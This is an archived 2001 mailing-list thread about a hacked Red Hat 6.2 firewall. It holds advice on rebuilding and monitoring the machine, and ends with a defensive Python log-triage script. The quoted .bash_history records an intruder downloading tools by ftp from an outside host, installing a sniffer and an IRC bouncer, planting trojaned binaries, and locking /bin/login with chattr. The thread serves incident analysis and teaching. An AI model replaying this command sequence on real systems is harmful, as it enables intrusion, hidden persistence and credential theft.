[CLUE-Tech] Fwd: Re: blitznet crack attack

jimintriglia at americanisp.net jimintriglia at americanisp.net
Fri Jun 15 07:54:42 MDT 2001


Doing some homework... re: #3 - port 1080 connect attempts:

http://www.sans.org/newlook/resources/IDFAQ/socks.htm

-JimI.

> Greetings All,
> 
> Interesting post/info on the PortSentry mailing list (see what follows) re: another
> successful crack that PortSentry caught after the fact (the damage was done).
> 
> For Discussion:
> 
> 1) .bash_history that is being reviewed in the post... would that file be
> located in the /home/daemon directory, root user directory or what?
> 
> 2) If PortSentry posts an AttackAlert, what/where .bash_history files should be
> viewed and inspected to see what the cracker was up to?
> 
> 3) I've seen attempts on my own system via port 1080. This is used by servers
> running as proxy servers, yes?
> 
> Bonus Questions: What did the cracker do, and how did he get in? How could this
> have been prevented?
> 
> -JimI.
> 
> Jim Intriglia
> IT Systems and Software Developer
> www.JimIntriglia.com
> 
> Forwarded Message:
> > To: jimintriglia at americanisp.net
> > From: "Jim Intriglia" <jimintriglia at hotmail.com>
> > Subject: Fwd: Re: [Abacus] blitznet hack
> > Date: Fri, 15 Jun 2001 12:39:46 
> > -----
> > 
> > 
> > 
> > >From: "J.D. Stevens" <dave at stevens.com>
> > >To: Ian Campbell <ijac79 at hotmail.com>
> > >CC: abacus at psionic.com
> > >Subject: Re: [Abacus] blitznet hack
> > >Date: Fri, 15 Jun 2001 06:19:12 -0500
> > >
> > >Disconnect from the Internet. Put in a new disk drive for the operating system.
> > >Install the operating system of your choice. Install ALL SECURITY PATCHES.
> > >Disable any unnecessary services. Put in appropriate monitoring, blocking, and
> > >notification software. I use Tripwire, Portsentry, and Logcheck. Change all
> > >passwords on any machines that this one could sniff. Mount the hacked disk read
> > >only in order to extract configurations, account information, etc.
> > >
> > >Be sure to check any systems accessible from or through the hacked machine. Who
> > >knows what they picked up with the sniffer.
> > >
> > >Hackers got into my RH 6.2 machine in January through wu-ftpd. I had it
> > >configured properly, but didn't get a security patch in soon enough. After I
> > >rebuilt, they tried many more times to break in. So far so good. There are
> > >several vulnerabilities in RH 6.2 as it comes out of the box. The Red Hat web
> > >site has information on steps to take to secure the system.
> > >
> > >My server is a leased system at Rackspace. They provided excellent support after
> > >the hack. They provided the suggestion to put in the new drive and mount the old
> > >one read-only. They had the new drive and OS installed within four hours of my
> > >call. It took me an additional 14 hours to reconfigure the system. I do all of
> > >the work remotely. I've never seen or touched the server.
> > >
> > >   Good luck,
> > >
> > >   Dave Stevens
> > >   STEVENS.COM, Inc.
> > >   Houston, TX, USA
> > >
> > >Ian Campbell wrote:
> > > >
> > > > Well, got a bit of shock this morning when I couldn't ssh into the firewall at
> > > > a client site.  I got one of the techs there to have a look and sure enough at
> > > > the login was the message "eth0 running in promiscuous mode".  Not a good start.
> > > >
> > > > The logs show a lot of things that I don't want to see.
> > > >
> > > > Jun 15 04:54:33 gw inet: inetd shutdown succeeded
> > > > Jun 15 04:54:34 gw inetd[5384]: Bad config for ALL:ALL: Incomplete config entry (skipped)
> > > > Jun 15 04:54:34 gw inet: inetd startup succeeded
> > > > Jun 15 04:55:17 gw inet: inetd shutdown succeeded
> > > > Jun 15 04:55:17 gw inet: inetd startup succeeded
> > > > Jun 15 05:01:51 gw PAM_pwdb[5628]: (su) session opened for user daemon by (uid=0)
> > > > Jun 15 05:01:55 gw modprobe: Note: /etc/conf.modules is more recent than /lib/modules/2.2.14-5.0/modules.dep
> > > > Jun 15 05:01:55 gw modprobe: modprobe: Can't locate module net-pf-10
> > > > Jun 15 05:02:24 gw PAM_pwdb[5628]: (su) session closed for user daemon
> > > > Jun 15 05:03:07 gw PAM_pwdb[5642]: (su) session opened for user daemon by (uid=0)
> > > > Jun 15 05:03:09 gw modprobe: Note: /etc/conf.modules is more recent than /lib/modules/2.2.14-5.0/modules.dep
> > > > Jun 15 05:03:09 gw modprobe: modprobe: Can't locate module net-pf-10
> > > > Jun 15 05:03:59 gw portsentry[682]: attackalert: Connect from host: proxy5.monitor.dal.net/130.227.3.123 to TCP port: 1080
> > > > Jun 15 05:03:59 gw portsentry[682]: attackalert: Host 130.227.3.123 has been blocked via wrappers with string: "ALL: 130.227.3.123"
> > > > Jun 15 05:04:00 gw portsentry[682]: attackalert: Host 130.227.3.123 has been blocked via dropped route using command: "/sbin/ipchains -I input -s 130.227.3.123 -j DENY -l"
> > > > Jun 15 05:04:00 gw kernel: Packet log: input DENY eth1 PROTO=6 130.227.3.123:1604 203.22.71.55:1080 L=44 S=0x60 I=47800 F=0x4000 T=48 SYN (#1)
> > > > Jun 15 05:04:03 gw kernel: Packet log: input DENY eth1 PROTO=6 130.227.3.123:1604 203.22.71.55:1080 L=44 S=0x60 I=48032 F=0x4000 T=48 SYN (#1)
> > > > Jun 15 05:04:09 gw kernel: Packet log: input DENY eth1 PROTO=6 130.227.3.123:1604 203.22.71.55:1080 L=44 S=0x60 I=48556 F=0x4000 T=48 SYN (#1)
> > > > Jun 15 05:04:21 gw kernel: Packet log: input DENY eth1 PROTO=6 130.227.3.123:1604 203.22.71.55:1080 L=44 S=0x60 I=49656 F=0x4000 T=48 SYN (#1)
> > > > Jun 15 05:04:45 gw kernel: Packet log: input DENY eth1 PROTO=6 130.227.3.123:1604 203.22.71.55:1080 L=44 S=0x60 I=51276 F=0x4000 T=48 SYN (#1)
> > > > Jun 15 05:07:12 gw modprobe: Note: /etc/conf.modules is more recent than /lib/modules/2.2.14-5.0/modules.dep
> > > > Jun 15 05:07:12 gw modprobe: modprobe: Can't locate module net-pf-10
> > > > Jun 15 05:07:20 gw kernel: Packet log: input DENY eth1 PROTO=6 130.227.3.123:4736 203.22.71.55:1080 L=44 S=0x60 I=64668 F=0x4000 T=48 SYN (#1)
> > > > Jun 15 05:07:23 gw kernel: Packet log: input DENY eth1 PROTO=6 130.227.3.123:4736 203.22.71.55:1080 L=44 S=0x60 I=64878 F=0x4000 T=48 SYN (#1)
> > > > Jun 15 05:07:29 gw kernel: Packet log: input DENY eth1 PROTO=6 130.227.3.123:4736 203.22.71.55:1080 L=44 S=0x60 I=65170 F=0x4000 T=48 SYN (#1)
> > > > Jun 15 05:07:41 gw kernel: Packet log: input DENY eth1 PROTO=6 130.227.3.123:4736 203.22.71.55:1080 L=44 S=0x60 I=256 F=0x4000 T=48 SYN (#1)
> > > > Jun 15 05:08:05 gw kernel: Packet log: input DENY eth1 PROTO=6 130.227.3.123:4736 203.22.71.55:1080 L=44 S=0x60 I=1618 F=0x4000 T=48 SYN (#1)
> > > > Jun 15 05:16:51 gw PAM_pwdb[5642]: (su) session closed for user daemon
> > > > Jun 15 05:17:48 gw kernel: libtty uses obsolete (PF_INET,SOCK_PACKET)
> > > > Jun 15 05:17:48 gw kernel: eth0: Promiscuous mode enabled.
> > > > Jun 15 05:17:48 gw kernel: device eth0 entered promiscuous mode
> > > >
> > > >
> > > > .bash_history shows what they were up to
> > > >
> > > > ls -al
> > > > pico /etc/inetd.conf
> > > > /etc/et
> > > > /etc/rc.d/init.d/inet restart
> > > > cd /lib/libx.so
> > > > ls -al
> > > > mv xp mountd
> > > > chmod +xs mountd
> > > > ls -al
> > > > ftp h9.s5.com
> > > > ls -al
> > > > hostname
> > > > gunzip *.gz
> > > > ls -al
> > > > tar -xvf blitznet.tar
> > > > tar -xvf psyBNC2.2.1.tar
> > > > ls -al
> > > > rm *.tar
> > > > chown daemon psybnc
> > > > chgrp daemon psybnc
> > > > cd psybnc
> > > > make
> > > > chown daemon *
> > > > chgrp daemon *
> > > > su daemon
> > > > locate bnc
> > > > locate psybnc
> > > > find / -name psybnc
> > > > cd /
> > > > locate bnc
> > > > cd /lib/libx.so
> > > > ls -al
> > > > cd psybnc
> > > > su daemon
> > > > ls -al
> > > > cd ..
> > > > ls -al
> > > > mv lib libtty
> > > > chmod +x libtty ps
> > > > chmod +xs wipe
> > > > ls -al
> > > > ./ps psybnc libtty mountd hellnine slice2
> > > > chattr +ai /bin/ps
> > > > chattr +ai /bin/.ps
> > > > chattr +ai /bin/login
> > > > ls -al
> > > > ./libtty
> > > > ps -aux
> > > > ls -al
> > > > uptime
> > > > exit
> > > >
> > > >
> > > > So, I'm still not sure how they actually got in.  The box is running redhat
> > > > 6.2 without any patches.  What now?  How can I clean my system?
> > > >
> > > > Should I be upgrading my inetd version?  Can anyone offer any advice or point
> > > > me to a security list that can?
> > > >
> > > > Going to be a busy day.
> > > >
> > > > Ian
> > > >
> > > > 
> > > >
> > > > _______________________________________________
> > >
> > >--
> > >=====================================================================
> > >Dave Stevens      |    dave at stevens.com   |    http://www.stevens.com
> > >STEVENS.COM, Inc. |      713-419-0313     | http://www.prettygood.net
> > >                   |    Houston, TX, USA   |
> > >=====================================================================
> > >_______________________________________________
> > 
> 
> 
> _______________________________________________
> CLUE-Tech mailing list
> CLUE-Tech at clue.denver.co.us
> http://clue.denver.co.us/mailman/listinfo/clue-tech
> 


Jim Intriglia
IT Systems and Software Developer
www.JimIntriglia.com
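As an added illustration for the discussion questions (this is not code from the thread, from PortSentry or from any of the posters), here is a small triage script for syslog output in the format Ian pasted. It separates the evidence that bears on the bonus question (root switching into the daemon account with no login before it, and eth0 entering promiscuous mode, i.e. a sniffer) from the noise that only confirms a block worked (the repeated ipchains DENY entries for the already-blocked 130.227.3.123). The sample log embedded in it is constructed to match the quoted format, using the addresses that appear on the page; the regular expressions, the finding names and the severity ordering are my own assumptions.

```python
import re
from collections import Counter

# Constructed sample lines in the syslog format quoted in Ian's post
# (host "gw", PAM_pwdb su records, PortSentry attackalerts, ipchains
# "Packet log" entries, kernel promiscuous-mode messages). Not a copy of
# the original log; the addresses are the ones shown on the page.
SAMPLE_LOG = """\
Jun 15 04:54:33 gw inet: inetd shutdown succeeded
Jun 15 04:54:34 gw inet: inetd startup succeeded
Jun 15 05:01:51 gw PAM_pwdb[5628]: (su) session opened for user daemon by (uid=0)
Jun 15 05:02:24 gw PAM_pwdb[5628]: (su) session closed for user daemon
Jun 15 05:03:59 gw portsentry[682]: attackalert: Connect from host: proxy5.monitor.dal.net/130.227.3.123 to TCP port: 1080
Jun 15 05:03:59 gw portsentry[682]: attackalert: Host 130.227.3.123 has been blocked via wrappers with string: "ALL: 130.227.3.123"
Jun 15 05:04:00 gw kernel: Packet log: input DENY eth1 PROTO=6 130.227.3.123:1604 203.22.71.55:1080 L=44 S=0x60 I=47800 F=0x4000 T=48 SYN (#1)
Jun 15 05:04:03 gw kernel: Packet log: input DENY eth1 PROTO=6 130.227.3.123:1604 203.22.71.55:1080 L=44 S=0x60 I=48032 F=0x4000 T=48 SYN (#1)
Jun 15 05:17:48 gw kernel: eth0: Promiscuous mode enabled.
Jun 15 05:17:48 gw kernel: device eth0 entered promiscuous mode
"""

# "Mon DD HH:MM:SS host prog[pid]: message" (classic BSD syslog framing)
SYSLOG_RE = re.compile(
    r"^(?P<ts>\w{3} +\d+ \d\d:\d\d:\d\d) (?P<host>\S+) "
    r"(?P<prog>[^:\[]+)(?:\[(?P<pid>\d+)\])?: (?P<msg>.*)$")
# PAM_pwdb records "by (uid=0)" or "by root(uid=0)" depending on version
SU_OPEN_RE = re.compile(
    r"\(su\) session opened for user (?P<user>\S+) by \S*?\(uid=(?P<uid>\d+)\)")
ATTACK_RE = re.compile(
    r"attackalert: Connect from host: \S+/(?P<ip>[\d.]+) to (?:TCP|UDP) port: (?P<port>\d+)")
PACKET_RE = re.compile(
    r"Packet log: \S+ (?P<verdict>\S+) (?P<iface>\S+) PROTO=\d+ "
    r"(?P<src>[\d.]+):\d+ (?P<dst>[\d.]+):(?P<dport>\d+)")
PROMISC_RE = re.compile(r"\b(?P<iface>eth\d+)\b.*promiscuous mode", re.IGNORECASE)

# Assumed ordering: what to read first when the pager goes off
SEVERITY = {"promiscuous": 0, "root_su": 1, "portsentry_alert": 2, "denied_connects": 3}


def parse_line(line):
    """Split one syslog line into its fields, or return None if it does not parse."""
    m = SYSLOG_RE.match(line)
    return m.groupdict() if m else None


def triage(log_text):
    """Walk the log once and return a list of findings, most serious first."""
    findings = []
    denied = Counter()        # (src, dport, iface) -> number of DENY entries
    promisc_seen = set()
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        ts, prog, msg = rec["ts"], rec["prog"], rec["msg"]
        if prog == "PAM_pwdb":
            m = SU_OPEN_RE.search(msg)
            if m and m["uid"] == "0":
                # root stepping down into a service account is unusual on a
                # firewall; in the quoted history it is where psybnc was staged
                findings.append({"kind": "root_su", "ts": ts, "user": m["user"]})
        elif prog == "portsentry":
            m = ATTACK_RE.search(msg)
            if m:
                findings.append({"kind": "portsentry_alert", "ts": ts,
                                 "src": m["ip"], "port": int(m["port"])})
        elif prog == "kernel":
            m = PACKET_RE.search(msg)
            if m and m["verdict"] == "DENY":
                # retries from an already-blocked host: count them, do not page
                denied[(m["src"], int(m["dport"]), m["iface"])] += 1
                continue
            m = PROMISC_RE.search(msg)
            if m and m["iface"] not in promisc_seen:
                # a sniffer on the gateway: every cleartext credential that crossed
                # it is suspect, which is why Dave says to change them all
                promisc_seen.add(m["iface"])
                findings.append({"kind": "promiscuous", "ts": ts, "iface": m["iface"]})
    for (src, port, iface), n in denied.items():
        findings.append({"kind": "denied_connects", "src": src, "port": port,
                         "iface": iface, "count": n})
    findings.sort(key=lambda f: SEVERITY[f["kind"]])   # stable: keeps log order within a kind
    return findings


if __name__ == "__main__":
    for f in triage(SAMPLE_LOG):
        print(f)
```

Run against the quoted log, the first thing printed is the promiscuous-mode event, then the su into daemon by uid=0 at 05:01:51; the five-plus DENY lines collapse into a single count. The point for question 2 is the timeline this gives you: the su happens with no login recorded before it, so the .bash_history worth reading is root's and daemon's, and the PortSentry alert that arrived at 05:03:59 was already two minutes into the intruder's session.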



